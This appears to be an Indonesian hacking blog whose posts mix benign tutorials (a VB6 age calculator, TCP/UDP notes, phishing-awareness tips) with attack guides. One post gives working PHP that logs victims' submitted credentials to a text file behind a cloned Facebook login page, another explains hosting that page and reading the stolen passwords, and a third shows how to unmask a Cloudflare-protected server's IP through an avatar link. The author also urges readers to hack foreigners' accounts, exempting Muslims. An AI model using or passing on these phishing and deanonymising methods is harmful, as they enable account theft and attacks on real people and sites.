Friday, 27 September 2013

Bypassing Cloudfare Untuk Mendapat IP Real

Banyak forum atau situs besar yang menggunakan jasa cloudfire karena mereka percaya bahwa memiliki perlindungan terhadap serangan seperti halnya DDOS . Saya akan menunjukkan kepada kalian sebuah metodhe yang sangat mudah untuk memotong Cloudflare untuk melihat REAL(Asli) forum IP. Untuk contoh ini saya akan menggunakan situs Hacker terbesar di Indonesia yaitu Hack*r - Newbi* . org . Kita langsung saja bypassing IP asli dari cloudfire :

1. Pertama buka link IP Logger di bawah ini :
2. Lalu copy link gambar pada kotak ketiga seperti gambar dibawah ini :

3. Langkah selanjutnya cari situs/forum target kemudian login sebagai pengguna dan setting profile untuk mengubah avatar (photo profile) 

 4. Pergantian avatar telah selesai, secara otomatis web server melakukan Ping terhadap url image tadi sehingga IP address web server tersebut terekam ke dalam file log. Jika terjadi semacam error abaikan saja !

 5. Tahap terakhir tinggal melihat hasil dari penanaman link image tersebut . Buka link IPLogger tadi lalu klik "View Log" untuk melihat Real IPnya


Cara ini hanya merupakan gambaran singkat, tingkat keberhasilannya tergantung dari system keamanan dan configurasi yang ada pada server tersebut, untuk melihat data site yang menggunakan cloudfire bisa di lihat di http://www.cloudflare-watch.org/ . Jadi tidak semua IP address yg disembunyikan melalui fitur Cloudflare bisa di bypass dengan mudah.Sekian dari saya, Wasallamu'alaikum Wr. Wb.

Labels:

Saturday, 21 September 2013

Penghitung Umur Simpel VisualBasic6

Tanggal lahir saya 15 Juli 1999, tapi saya tidak menyangka itu sudah berjalan 72 hari dari tahun sekarang ini 2013 . Meskipun ini terlalu simple dan tidak sebegitu detail mungkin kalian bisa membuatnya sendiri aplikasi penghitung umur otomatisnya.

Pada aplikasi kali ini kita membutuhkan komponen DTPicker dimana untuk mengaktifkan komponen DTPicker tersebut maka kita terlebih dahulu harus mencentang komponen Micr*soft Wind*ws Common Controls-2 6.0 sehingga komponen DTPicker akan terlihat dalam barisan Toolbox. Tanpa lama kalian simak tutorial dibawah ini :


  • Pertama buka Micorosft Visual Basic6 kalian lalu pilih StandardEXE;-
preview.text-visualB6
    • Aktifkan Microsoft Windows Common Control-2 6.0 dengan cara menekan Ctrl+T atau klik kanan tab editor dan klik "Component..." untuk menampilkan Component, kemudian cari ke bawah sampai menemukan  Micr*soft Wind*ws Common Control-2 6.0 lalu klik Apply. Setelah itu lihatlah pada deretan Toolbox maka akan terdapat tambahan lima Tools salah satunya adalah DTPicker;
    visual basic
     Gambar Step1,-

    basic 6
    Gambar Step2,-

    vb6-create
    Gambar Step3,-

    • Kemudian masukkan sebuah komponen DTPicker ke form1 dan ubahlah properties Format menjadi 0-dtpLongDate, untuk ukuran DTPicker tergantung selera kalian;
    visaul basic
    • Untuk tambahan masukkan komponen Label dan komponen CommandButton sebagai eksekutor perintah. Ganti caption pada Label1 menjadi "Tanggal Lahir Saya" dan caption pada CommandButton1 menjadi "Hitung Umur Saya", sehingga jadi seperti di bawah ini :


    • Klik 2x pada Command1 dan masukkan source code dibawah ini :

     Dim totalhari As Integer
      Dim umur As Integer
      Dim hari As Integer

      totalhari = DateDiff("d", DTPicker1.Value, Date)
      umur = totalhari / 365
      hari = totalhari - (umur * 365)
      MsgBox "Umur Anda " & umur & " tahun " & hari & " hari"

     Klik kanan lalu klik View Code kemudian letakan sourcenya,-
    • Selesai


    Untuk melihat hasilnya, tekan Run atau tombol F5. Sekian tutorial kali ini semoga bermannfaat. Dapatkan source codenya secara instant yang bisa kalian download di link di bawah ini :

    Download Source

      Labels:

      Friday, 20 September 2013

      Test IQ Anti Phising diSonic Wall

      Kali ini saya akan memberikan solusi buat kalian semua yang ingin menguji tingkat kehati-hatiannya terhadap phising. Langsung saja kalian kunjungi link dibawah ini :

      Click here to view now !

      Untuk lebih jelas bisa lihat gambar di bawah ini pada saat test:






      Disitu terdapat 3 pilihan jawaban

      • No Answer = Tidak Menjawab
      • Legitimate = Bukan Phising ( Sah )
      • Dan Phising = Benar Jebakan Phising
      Kelebihannya antara lain :
      • Tidak ada batasan waktu
      • Disertai alasan mengapa hal itu bisa benar atau salah
      • Mendapatkan score pastinya :)
      Gambar di bawah ini merupakan contoh hasil test kemarin dari saya. :)


       Semoga saja membantu kalian semua untuk semakin waspada terhadap serangan phising . Salam ...

       

      Labels:

      Cara Membuat Script Web Phising

      Phising, yang berasal dari kata fishing yang diartikan dalam bahasa indonesia artinya memancing. Benar ! teknik metodhe ini tidak asing lagi bagi para hacker yang ingin mengetahui identitas korbannya. Akan tetapi phising ini juga bisa disediakan dalam bentuk website yang sebagai manipulasi ( fake ) . Bagaimana cara membuat page scriptnya ? Langsung saja kalian simak cara membuat page phising berbasis web sebagai berikut :

      1. Pertama kunjungi dan lihat source code situs yang ingin dibuat jebakan phising (Ex : facebook, paypal, yahoo, etc ) lalu lihat source codenya (Ctrl + U ) atau klik kanan mouse lalu pilih view source itu pun kalau mozilla & Chrome, Entah apa kalau memakai browser yang lain :) . Lihat Gambar dibawah untuk lebih jelasnya :

      2. Lalu copy dan pastekan di notepad, kemudian Save file tersebut dengan nama " index.htm atau index.html " .

      3. Selanjutnya kita mengedit bagian source dengan langkah - langkah :
      • Cari code " action= " (Ctrl + F untuk mencari ) lalu hapus alamat asli facebook dan ganti dengan " /login.php " ( Untuk direct ) . 
      • Dan ganti metodhenya dari " post " menjadi "get " .Lihat Gambar dibawah ini !
       4. Sesudah itu, buat page headernya (" login.php ") untuk direct akses page web. Buka notepad kalian lalu isikan dengan code dibawah ini lalu save dengan nama " login.php " :


       <?php
      header("Location: http://www.google.com");
      $handle = fopen("passes.txt", "a");
      foreach($_GET as $variable => $value)
      {
      fwrite($handle, $variable);
      fwrite($handle, "=");
      fwrite($handle, $value);
      fwrite($handle, "\r\n");
      }
      fwrite($handle, "\r\n");
      fclose($handle);
      exit;
      ?>


      Seperti gambar dibawah ini :

      Keterangan :
      • http://www.google.com alamat yang akan muncul ketika sesi login selanjutnya. Bisa diedit misalnya : http://facebook.com, yahoo.com, dll
      • passes.txt , untuk melihat password dengan melalui url . Ex : http://domainkalian.com/passes.txt
      5 . Selanjutnya kalian bisa ujicoba web phising tersebut dengan menguploadkannya di hosting kalian!

      Semoga bermanfaat bagi kalian. Ingat ! ini hanya untuk pembelajaran bukan untuk kejahatan, kalau misalkan mau akun facebook ,rentaslah milik orang luar negeri (kecuali bangsa muslim) dari pada dalam negeri karena itu menghancurkan bangsa sendiri dan agama melalui hacking. Wasalamu'alaikum Wr. Wb .

      Labels:

      Thursday, 12 September 2013

      Hack Facebook Mudah Orang Lain Dengan Phising

      Kali ini saya akan memberikan tutorial cara hack facebook orang lain dengan metodhe phising . Apa itu phising ? Bisa kalian lihat penjelasannya dan pengertian phising di artikel blog yang berjudul Pengertian Phising atau Fake . Langsung saja kalian simak baik baik .

      Perlengkapan yang di butuhkan !

      • Hosting gratis
      • Domain atau nama site ( tidak juga tidak apa - apa sunnah kok maz mbak.. )
      • Script Phising ( Untuk Home Page ) bisa didownload disini
      • Oiya bubur kacang ijo + Es Marimas, kalau bingung baca tinggal sruput minum saja dahh .. :) 
      Pertama kalian harus membutuhkan hosting untuk memasang sebuah script yang digunakan untuk menjebak. Saya haruskan kalian memakai hosting gratis yg bisa kalian cari di google. Tapi kali ini saya memakai hosting yang lagi tenar yaitu idhostinger. Lihat Site Idhostinger!

      1. Silahkan daftar terlebih dahulu disitus resmi hosting gratis yang kalian gunakan memakai email dan jangan lupa confirmasikan ( setujui ) lewat email kalian juga . Lalu login sebagai user ( pengguna ). 
      2. Buat web hosting pertama kalian dan isi sesuai gambar di bawah ini !
      • Jika tidak mempunyai alamat website (domain) . bisa pakai yang gratis/free yaitu subdomain .

      3. kalau sudah masuk ke control panel hosting lalu pergi ke file manajer 3

      4. Lalu masuk ke public_html lalu kita cari tombol upload!

      5. Lalu masukan filenya dalam bentuk RaR atau yang sebelahnya files juga boleh :)lalu lalu klik centang

      6.Lalu lihat hasilnya,sekilas webiste kalian akan tampak seperti facebook asli . Dan itu digunakan untuk menipu korban . Untuk mengecek password dan usernamenya , lihat di http://alamatkalian/pass.txt Contoh punya saya : http://contohphising.tk ->lihat informasinya ke http://contohphising.tk/pass.txt

      Ini gambarnya untuk memperjelaskan


      artikel lainnya yang terkait di sini yaitu Cara Membuat Page Script Phising Sendiri
      Mohon maaf kalau tutorial ini kurang lengkap, mohon dimaklumi karena admin lagi sibuk :D . Salam

      Labels:

      Wednesday, 4 September 2013

      Pengertian Phising atau Fake

      Sudah tidak asing lagi di dunia internet sebuah layanan yang terkenal dijadikan sarana untuk melakukan tindakan kejahatan, salah satunya adalah phising atau fake(palsu). Dari dulu sampai sekarang sudah banyak kegiatan itu yang menggunakan layanan seperti facebook, friendster, tagged, myspace dll. Phising adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi secara detail, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang terpercaya dalam sebuah komunikasi elektronik resmi, seperti ponsel atau pesan instan. Istilah phishing dalam bahasa Inggris berasal dari kata fishing (’memancing’), dalam hal ini berarti memancing informasi keuangan dan kata sandi pengguna, Phising juga didefinisikan sebagai sebuah kegiatan memancing pemakai komputer di internet (user) agar mau memberikan informasi data diri pemakai (username) dan kata sandinya (password) pada suatu website yang sudah di-deface atau dibobol. Phising biasanya diarahkan kepada pengguna online banking. Isian data pemakai dan password yang vital yang telah dikirim akhirnya akan menjadi milik penjahat tersebut dan digunakan untuk belanja dengan kartu kredit atau uang rekening milik korbannya.
      Pada phising facebook ini, si pelaku hanya berusaha untuk mengambil username dan password saja karena saat mencoba login user dihantarkan pada halaman Address Not Found.
      Situs jejaringan sosial seperti Friendster dan Facebook sepertinya menjadi ladang sekaligus ajang untuk para hacker unjuk kebolehan mereka dalam melakukan teknik hacking dengan berbagai cara. Salah satu teknik hacking yang paling umum adalah phising ini. Pengertian phising sendiri adalah upaya atau tindakan untuk memancing seseorang ke web yang telah telah dibuat, umumnya web phising ini dibuat menyerupai web-web yang sering dikunjungin orang seperti Friendster. Dengan teknik phising, seseorang telah diperdaya untuk memberikan informasi yang krusial seperti password secara tidak sadar.
      Pertama kali istilah “phising” dipublikasikan oleh American Online Usernet Newgroup pada tanggal 2 Januari 1996 dan mulai menjamur pada tahun 2004. Pada tahun tersebut, perkembangan phising di dunia maya berkembang dengan pesat. Total kerugian akibat phising ditahun 2004 mencapai US$929 juta dengan melibatkan lebih dari 15.000 situs yang menjadi korbannya.
      Kebanyakan dari teknik phising adalah melakukan manipulasi sebuah link di dalam email yang akan dikirimkan ke korbannya. Dengan adanya email, praktek phising terbilang mudah hanya dengan melakukan spam pada email dan kemudian menunggu korbannya untuk masuk kedalam tipuannya. Untuk meyakinkan bahwa link yang diberikan asli, biasanya si hacker ini akan membuat sebuah web yang sama persis dengan yang aslinya, perbedaannya URL yang dituju berbeda dengan link yang diberikan. Untuk orang awam yang kurang mengerti tentang web mungkin akan cenderung mudah ditipu, hal ini lah yang harus menjadi waspada untuk Anda agar tidak terkena korban penipuan. Antara link yang diberikan dengan address yang dituju tidak sesuai. Anda hanya tau dan akan menyangka bahwa link tersebut adalah benar karena dikirim melalui email.

      Man in the middle

      Satu teknik pada Web Phising yang sulit dilacak kebenarannya dengan “mata telanjang” adalah Man In The Middle. Pasalnya Man In The MIddle dapat merubah segala informasi yang benar menjadi tidak benar. Untuk pengertiannya Man in the middle adalah sebuah perantara yang dapat mengubah informasi ditengah proses dua arah. Contohnya ketika kita membuka situs XYZ terdapat informasi A. Dengan adanya Man In The Middle, informasi A disitu XYZ yang akan diakses oleh user dapat dimanipulasi dan berubah menjadi informasi B. Sehingga orang tidak akan sadar bahwa ia sedang di tipu.

      Phone Phising

      Cara ini jarang dilakukan, karena persentase keberhasilannya sangat kecil, kecuali orang yang menjadi otak dibalik layar ini dapat benar-benar meyakinkan si korban agar mengikuti apa yang ia perintahkan. Teknik phone phising dilakukan dengan cara menelpon si korban dan mengaku sebagai pegawai dari bank atau perusahaan, dengan berbagai alasan ia akan meminta account dan password bank atau informasi penting lainnya. Jika Anda tertipu dengan apa yang ia sampaikan, maka secara otomatis account dan password Anda telah berpindah tangan. Di Indonesia, Phone phising pernah diterapkan. Jika kasus diatas menggunakan telepon, di Indonesia lebih marak menggunakan SMS ( Short Message Service ) sebagai bentuk penipuan. Penipuan biasanya dikirim menggunakan SMS ke berbagai nomor dan didalam SMS tersebut berisi iming-imingi sejumlah uang agar si korban tertarik dan dapat ditipu.

      Pencegahan Phising

      Untuk menghindari Phising, ada beberapa hal yang harus dilakukan user ketika akan mengakses jejaringan sosial seperti facebook/friendster, yaitu:
      1. Jangan terlalu lengkap memasang profil atau data diri di Facebook. Tentunya semakin lengkap profil/data diri terpasang, semakin mudah mendapatkan teman. Tetapi di sisi lain, semakin beresiko pula data diri kita disalah-gunakan (abused).
      2. Jangan memasang foto-foto diri Anda yang sekiranya Anda sendiri tidak akan merasa nyaman apabila foto tersebut tersebarluaskan secara bebas. Ingatlah, walau foto tersebut “hanya” diposting di akun Facebook Anda, sebenarnya itu sama saja dengan menyebarlukaskan foto tersebut ke publik. Sekali terposting dan tersebar, maka sangat sulit (dan nyaris mustahil) Anda bisa mencabut foto Anda dari Internet. Maka, selektiflah dalam berpose dan memposting foto Anda.
      3. Jangan sembarangan ‘add friend‘ atau melakukan approval atas permintaan seseorang untuk menjadi teman Anda. Cara memilah dan memilihnya mudah, yaitu lihat saja berapa jumlah “mutual friends” antara Anda dengan seseorang tersebut. Semakin sedikit “mutual friends“-nya, berarti semakin sedikit teman-teman Anda yang kenal dengan dirinya, yang berarti semakin beresiko tinggi. Pastikan Anda hanya menerima “pertemanan” yang “mutual friends“-nya cukup banyak.
      4. Jangan sembarangan menerima tag photo. Bolehlah kita “banci tagging“, tetapi berupayalah lebih selektif. Artinya, sekali Anda terjun ke Facebook, rajin-rajinlah memeriksa “keadaan sekeliling”. Karena kita kadang menemukan foto diri kita yang di-upload dan di-tag oleh orang lain, padahal kita tidak suka foto tersebut disebarluaskan. Segera saja kita “untag” diri kita dari foto tersebut dan kalau perlu minta teman kita yang melakukan upload foto tersebut untuk mencabutnya.
      5. Jangan tunda-tunda, ketika Anda menemukan data atau profil Anda digunakan oleh pihak lain untuk hal-hal di luar kontrol Anda, segeralah bertindak. Membiarkannya, justru akan membuatnya makin berlarut dan berdampak destruktif, setidaknya untuk kenyamanan diri sendiri. Laporkan langsung ke pengelola layanan tempat kejadian ‘impersonation‘, untuk segera mencabut informasi aspal (asli tapi palsu) tersebut. Atau, mintalah bantuan pada orang atau pihak yang sekiranya bisa atau paham bagaimana mengatasi hal di atas.
      Secara lebih detail pencegahan kejahatan dunia maya bisa dicegah dengancara sebagai berikut:
      Web Phising :
      1. Ceklah dengan teliti URL atau address yang sedang Anda tuju, pastikan bahwa alamat yang tertera di Address bar adalah benar bahwa alamat tersebut adalah alamat yang Anda tuju.
      2. Biasakan mengetik URL atau alamat situs yang Anda tuju, hindari link dari Web yang Anda rasa mencurigakan.
      3. Gantilah password Anda secara berkala, baik 1 minggu, 2 minggu, 1 bulan atau pada periode tertentu, hal ini bermanfaat agar password Anda sulit dilacak.
      Gambar 2.6. Link URL yang dipalsukan.
      Pada gambar dijelaskan bawah link yang dikirim telah dipalsukan, dan URL yang dituju hampir mirip dengan aslinya. Sehingga dapat membuat kita tidak sadar bahwa link tersebut ternyata bukan link asli.

      Man In The Middle :

      Informasi yang Anda terima jangan langsung di “telan mentah-mentah” carilah beberapa sumber lagi untuk meyakinkan bahwa informasi tersebut memang benar.
      c. Phone Phising :
      1. Jangan cepat percaya terhadap informasi yang belum tentu benar apalagi menjanjikan sejumlah uang.
      2. Jika Anda mendapatkan hadiah sejumlah uang dari perusahaan atau provider, ada baiknya Anda menghubungi nomor telepon resmi ( bukan nomor yang diberikan melalui SMS ) untuk mengetahui kebenarannya. Biasanya perusahaan yang sudah cukup besar biasanya memberikan nomor Call Center yang dihubungi. Anda dapat memanfaatkan Call Center tersebut untuk mengetahui kebenaran dari hadiah tersebut.
      3. Jika Anda mengetahui sesuatu hal yang aneh, beritahulah orang-orang disekitar Anda agar mereka juga tidak menjadi korban penipuan jika memang benar bahwa hal yang Anda curigai adalah penipuan.

      Tips aman penggunaan facebook

      Semakin banyak pengguna dan fitur yang ada dalam situs jejaring sosial tersebut maka tidak akan lepas adanya masalah privasi dan sekuritas data-data pribadi. Tulisan ini tidak akan membahas penggunaan Facebook karena sudah pasti pembaca sekalian sudah familiar, namun ada tips buat mengamankan penggunaan Facebook itu sendiri.
      • Internet adalah fasilitas publik, Anda harus dapat memisahkan mana data yang dapat dipublikasi di internet dan mana yang tidak. Ingat, dengan “menelanjangi” data pribadi Anda maka secara tidak langsung data pribadi Anda tersebut dapat terancam. Jangan sembarangan memberikan data pribadi seperti nomer telpon, password, tanggal lahir, email, dan alamat. Bila kita mudah memberikan alamat email misalnya, maka ancaman spam akan datang bertubi-tubi.
      • Waspada dan tetap berpegang pada etika berinternet, Dalam berinternet kita harus waspada terhadap orang yang tidak kita ketahui secara jelas. Profil yang terpasang dalam Facebook harus terbaca dengan jeli dan jelas. Jangan sampai Anda tertipu dengan profil yang tidak jelas dan menipu. Selain itu bila Anda mendapat relasi baru dengan adanya pengguna yang ingin bergabung di Facebook Anda, maka Anda tetap berpegang dengan etika berinternet. Misalnya Anda dapat memberikan penjelasan baik melalui telpon atau messenger.
      • Awas, Virus dapat masuk ke Facebook, Anda harus berhati-hati terhadap link video atau aplikasi yang diberikan relasi Anda di Facebook. Anda jangan mudah percaya dengan mengklik link tersebut bila Anda tidak tahu betul / ragu karena bisa jadi link tersebut berisi virus atau spyware atau malware, dsb.
      • Perhatikan anak-anak dalam berinternet, Banyak pula saat ini anak-anak mencoba untuk membuat suatu Facebook atau social networking yang lain. Tidak disadari bahwa anak-anak tersebut mudah menjadi target kejahatan di internet. Anda harus berhati-hati dan menjaga anak-anak dalam beronline ria di internet.
      • Anda batasi hak akses bagi relasi Anda dalam Facebook, Hak akses yang ada dapat kita batasi dan bahkan bisa kita tutup untuk kemudian kita buka seperlunya sesuai kebutuhan kita.
      • Pastikan konfigurasi setting privacy dan security Facebook Anda, Anda dapat mengubah setting yang menyangkut privacy Anda dan profilnya di menu Settings dan kemudian pilih Privacy Settings.

      KESIMPULAN

      Adapun kesimpulan yang diperoleh dari pembahasan
      1. Facebook adalah website jaringan sosial dimana para pengguna dapat bergabung dalam komunitas seperti kota, kerja, sekolah, dan daerah untuk melakukan koneksi dan berinteraksi dengan orang lain. Orang juga dapat menambahkan teman-teman mereka, mengirim pesan, dan memperbarui profil pribadi agar orang lain dapat melihat tentang dirinya.
      2. Phising juga didefinisikan sebagai sebuah kegiatan memancing pemakai komputer di internet (user) agar mau memberikan informasi data diri pemakai (username) dan kata sandinya (password) pada suatu website yang sudah di-deface.
      3. Pada phising facebook pelaku hanya berusaha untuk mengambil username dan password saja karena saat mencoba login user dihantarkan pada halaman Address Not Found.
      4. Teknik yang ada pada modus phising terdiri dari manipulasi link, man in the middle dan phone phising.
      5. Untuk menghindari kejahatan dunia maya maka seorang user perlu mengtahui beberapa cara untuk menghindari modus phising, karena kebanyakan kasus kejahatan dunia maya disebabkan oleh kelalaian user.

      Labels:

      Tuesday, 3 September 2013

      Penjelasan Tentang TCP dan UDP



      1. TCP

      Pengertian TCP

      Transmission Control Protocol (TCP) adalah salah satu jenis protokol yang memungkinkan kumpulan komputer untuk berkomunikasi dan bertukar data didalam suatu network (jaringan). TCP merupakan suatu protokol yang berada di lapisan transpor (baik itu dalam tujuh lapis model referensi OSI atau model DARPA) yang berorientasi sambungan (connection-oriented) dan dapat diandalkan (reliable).
      TCP dipakai untuk aplikasi-aplikasi yang membutuhkan keandalan data.

      Awal Keberadaan TCP

      Konsep TCP/IP berawal dari kebutuhan DoD (Departement of Defense) AS akan suatu komunikasi di antara berbagai variasi komputer yg telah ada. Komputer-komputer DoD ini seringkali harus berhubungan antara satu organisasi peneliti dg organisasi peneliti lainnya, dan harus tetap berhubungan sehingga pertahanan negara tetap berjalan selama terjadi bencana, seperti ledakan nuklir. Oleh karenanya pada tahun 1969 dimulailah penelitian terhadap serangkaian protokol TCP/IP. Di antara tujuan-tujuan penelitian ini adalah sebagai berikut :
      1. Terciptanya protokol-protokol umum, DoD memerlukan suatu protokol yg dapat ditentukan untuk semua jaringan.
      2. Meningkatkan efisiensi komunikasi data.
      3. Dapat dipadukan dengan teknologi WAN (Wide Area Network) yg telah ada.
      4. Mudah dikonfigurasikan.

      Karakteristik TCP

      Karakteristik dari TCP antara lain yaitu :
      1. Reliable berarti data ditransfer ke tujuannya dalam suatu urutan seperti ketika dikirim.
      2. Berorientasi sambungan (connection-oriented): Sebelum data dapat ditransmisikan antara dua host, dua proses yang berjalan pada lapisan aplikasi harus melakukan negosiasi untuk membuat sesi koneksi terlebih dahulu. Koneksi TCP ditutup dengan menggunakan proses terminasi koneksi TCP (TCP connection termination).
      3. Full-duplex: Untuk setiap host TCP, koneksi yang terjadi antara dua host terdiri atas dua buah jalur, yakni jalur keluar dan jalur masuk. Dengan menggunakan teknologi lapisan yang lebih rendah yang mendukung full-duplex, maka data pun dapat secara simultan diterima dan dikirim. Header TCP berisi nomor urut (TCP sequence number) dari data yang ditransmisikan dan sebuah acknowledgment dari data yang masuk
      4. Memiliki layanan flow control: Untuk mencegah data terlalu banyak dikirimkan pada satu waktu, yang akhirnya membuat “macet” jaringan internetwork IP, TCP mengimplementasikan layanan flow control yang dimiliki oleh pihak pengirim yang secara terus menerus memantau dan membatasi jumlah data yang dikirimkan pada satu waktu. Untuk mencegah pihak penerima untuk memperoleh data yang tidak dapat disangganya (buffer), TCP juga mengimplementasikan flow control dalam pihak penerima, yang mengindikasikan jumlah buffer yang masih tersedia dalam pihak penerima.
      5. Melakukan segmentasi terhadap data yang datang dari lapisan aplikasi (dalam DARPA Reference Model)
      6. Mengirimkan paket secara “one-to-one“: hal ini karena memang TCP harus membuat sebuah sirkuit logis antara dua buah protokol lapisan aplikasi agar saling dapat berkomunikasi. TCP tidak menyediakan layanan pengiriman data secara one-to-many.

      Cara Kerja TCP/IP

      Adapun langkah-langkah cara kerja dari protokol TCP/IP ini adalah :
      1. Pertama, datagram dibagi-bagi ke dalam bagian-bagian kecil yang sesuai dengan ukuran bandwith (lebar frekuensi) dimana data tersebut akan dikirimkan.
      2. Pada lapisan TCP, data tersebut lalu “dibungkus” dengan informasi header yang dibutuhkan. Misalnya seperti cara mengarahkan data tersebut ke tujuannya, cara merangkai kembali kebagian-bagian data tersebut jika sudah sampai pada tujuannya, dan sebagainya.
      3. Setelah datagram dibungkus dengan header TCP, datagram tersebut dikirim kepada lapisan IP.
      4. IP menerima datagram dari TCP dan menambahkan headernya sendiri pada datagram tersebut.
      5. IP lalu mengarahkan datagram tersebut ke tujuannya.
      6. Komputer penerima melakukan proses-proses perhitungan, ia memeriksa perhitungan checksum yang sama dengan data yang diterima.
      7. Jika kedua perhitungan tersebut tidak cocok berarti ada error sewaktu pengiriman dan datagram akan dikirimkan kembali.

      Kelebihan TCP/IP

      Beberapa kelebihan TCP/IP dibandingkan protokol yang lain antara lain:
      1. TCP/IP adalah protokol yang bisa diarahkan. Artinya ia bisa mengirimkan datagram melalui rute-rute yang telah ditentukan sebelumnya. Hal ini dapat mengurangi kepadatan lalu lintas pada jaringan, serta dapat membantu jika jaringan mengalami kegagalan, TCP/IP dapat mengarahkan data melalui jalur lain.
      2. Memiliki mekanisme pengiriman data yang handal dan efisien.
      3. Bersifat open platform atau platform independent yaitu tidak terikat oleh jenis perangkat keras atau perangkat lunak tertentu.
      4. Karena sifatnya yang terbuka, TCP/IP bisa mengirimkan data antara sistem-sistem komputer yang berbeda yang menjalankan pada sistem-sistem operasi yang berbeda pula.
      5. TCP/IP terpisah dari perangkat keras yang mendasarinya. Protokol ini dapat dijalankan pada jaringan Ethernet, Token ring, X.25, dan bahkan melalui sambungan telepon.
      6. TCP/IP menggunakan skema pengalamatan yang umum, maka semua sistem dapat mengirimkan data ke alamat sistem yang lain.

      Kegunaan TCP

      Beberapa kegunaan dari TCP yaitu :
      1. Menyediakan komunikasi logika antar proses aplikasi yang berjalan pada host yang berbeda
      2. protokol transport berjalan pada end systems
      3. Pengiriman file (file transfer). File Transfer Protokol (FTP) memungkinkan pengguna komputer yg satu untuk dapat mengirim ataupun menerima file ke komputer jaringan. Karena masalah keamanan data, maka FTP seringkali memerlukan nama pengguna (username) dan password, meskipun banyak juga FTP yg dapat diakses melalui anonymous, lias tidak berpassword. (lihat RFC 959 untuk spesifikasi FTP)
      4. Remote login. Network terminal Protokol (telnet) memungkinkan pengguna komputer dapat melakukan log in ke dalam suatu komputer didalam suatu jaringan. Jadi hal ini berarti bahwa pengguna menggunakan komputernya sebagai perpanjangan tangan dari komputer jaringan tersebut.( lihat RFC 854 dan 855 untuk spesifikasi telnet lebih lanjut)
      5. Computer mail. Digunakan untuk menerapkan sistem elektronik mail.
      6. Network File System (NFS). Pelayanan akses file-file jarak jauh yg memungkinkan klien-klien untuk mengakses file-file pada komputer jaringan jarak jauh walaupun file tersebut disimpan secara lokal. (lihat RFC 1001 dan 1002 untuk keterangan lebih lanjut)
      7. remote execution. Memungkinkan pengguna komputer untuk menjalankan suatu program didalam komputer yg berbeda. Biasanya berguna jika pengguna menggunakan komputer yg terbatas, sedangkan ia memerlukan sumber yg banyak dalam suatu system komputer. Ada beberapa jenis remote execution, ada yg berupa perintah-perintah dasar saja, yaitu yg dapat dijalankan dalam system komputer yg sama dan ada pula yg menggunakan “prosedure remote call system”, yg memungkinkan program untuk memanggil subroutine yg akan dijalankan di system komputer yg berbeda. (sebagai contoh dalam Berkeley UNIX ada perintah “rsh” dan “rexec”)
      8. name servers. Nama database alamat yg digunakan pada internet (lihat RFC 822 dan 823 yg menjelaskan mengenai penggunaan protokol name server yg bertujuan untuk menentukan nama host di internet.)

      Manajemen Koneksi TCP :

      Pada saat Setup Koneksi

      1. Client mengirimkan kontrol TCP SYN ke server, dengan memberikan sequence number inisial.
      2. Server menerima TCP SYN, dan membalasnya dengan kontrol SYNACK.
        • ACK yang menyatakan telah menerima SYN.
        • Mengalokasikan buffer.
        • Menghasilkan sequence number untuk ke client.

      Pada saat Menutup Koneksi

      1. Client mengirim kontrol TCP FIN ke server
      2. Server menerima FIN, dan membalas dengan ACK. Menutup koneksi dan mengirimkan FIN ke client.
      3. Client menerima FIN dan membalas ACK
        • Masuk pada masa menunggu balasan ACK terhadap dari server
      4. Server menerima ACK dan koneksi tertutup.

      Header TCP

      Ukuran dari header TCP adalah bervariasi, yang terdiri atas beberapa field yang ditunjukkan dalam gambar dan tabel berikut. Ukuran TCP header paling kecil (ketika tidak ada tambahan opsi TCP) adalah 20 byte. headerTCP-2

      Port TCP

      Port TCP mampu mengindikasikan sebuah lokasi tertentu untuk menyampaikan segmen-segmen TCP yang dikirimkan yang diidentifikasi dengan TCP Port Number. Nomor-nomor di bawah angka 1024 merupakan port yang umum digunakan dan ditetapkan oleh IANA (Internet Assigned Number Authority). Tabel berikut ini menyebutkan beberapa port TCP yang telah umum digunakan.
      Port TCP merupakan hal yang berbeda dibandingkan dengan port UDP, meskipun mereka memiliki nomor port yang sama. Port TCP merepresentasikan satu sisi dari sebuah koneksi TCP untuk protokol lapisan aplikasi, sementara port UDP merepresentasikan sebuah antrean pesan UDP untuk protokol lapisan aplikasi. Selain itu, protokol lapisan aplikasi yang menggunakan port TCP dan port UDP dalam nomor yang sama juga tidak harus sama. Sebagai contoh protokol Extended Filename Server (EFS) menggunakan port TCP dengan nomor 520, dan protokol Routing Information Protocol (RIP) menggunakan port UDP juga dengan nomor 520. Jelas, dua protokol tersebut sangatlah berbeda! Karenanya, untuk menyebutkan sebuah nomor port, sebutkan juga jenis port yang digunakannya, karena hal tersebut mampu membingungkan (ambigu). PORTtcp-1

      Aplikasi yang Menggunakan TCP

      1. World Wide Web

      Aplikasi ini pada prinsipnya mirip dengan aplikasi gopher, yakni penyediaan database yang dapat diakses tidak hanya berupa text, namun dapat berupa gambar/image, suara, video. penyajiannya pun dapat dilakukan secara live. Dengan demikian, jenis informasi yang dapat disediakan sangat banyak dan dapat dibuat dengan tampilan yang lebih menarik. Hal ini dimungkinkan karena Web menggunakan teknologi hypertext. Karena itu, protokol yang digunakan untuk aplikasi ini dikenal dengan nama Hypertext-transfer-protocol (HTTP).

      2. Archie

      Aplikasi FTP memungkinkan kita mentransfer file dari manapun di seluruh dunia. Hal itu dengan anggapan bahwa kita telah mengetahui lokasi di mana file yang kita cari berada. Namun jika kita belum mengetahui di mana file yang kita cari berada, kita memerlukan aplikasi untuk membantu kita mencari di mana file tersebut berada.
      Cara kerja Archie dapat dijelaskan sebagai berikut. Server Archie secara berkala melakukan anonymous ftp ke sejumlah FTP Server dan mengambil informasi daftar seluruh file yang ada pada FTP Server tersebut. Daftar ini disusun berdasarkan letak file dalam direktori/sub direktori, sehingga mudah untuk menemukan file tersebut. File-file yang berisi daftar file tiap FTP Server ini merupakan database dari Archie Server. Jika ada query ke Archie Server yang menanyakan suatu file, server mencari dalam daftar tadi dan mengirimkan seluruh jawaban yang berkaitan dengan file tersebut. Informasi yang diberikan adalah alamat FTP Server yang memiliki file tersebut dan letak file tersebut dalam struktur direktori.

      3. Wide Area Information Services (WAIS)

      WAIS merupakan salah satu servis pada internet yang memungkinkan kita mencari melalaui materi yang terindeks dan menemukan dokumen/artikel berdasarkan isi artikel tersebut. Jadi pada dasarnya, WAIS memberikan layanan untuk mencari artikel yang berisi kata-kata kunci yang kita ajukan sebagai dasar pencarian.
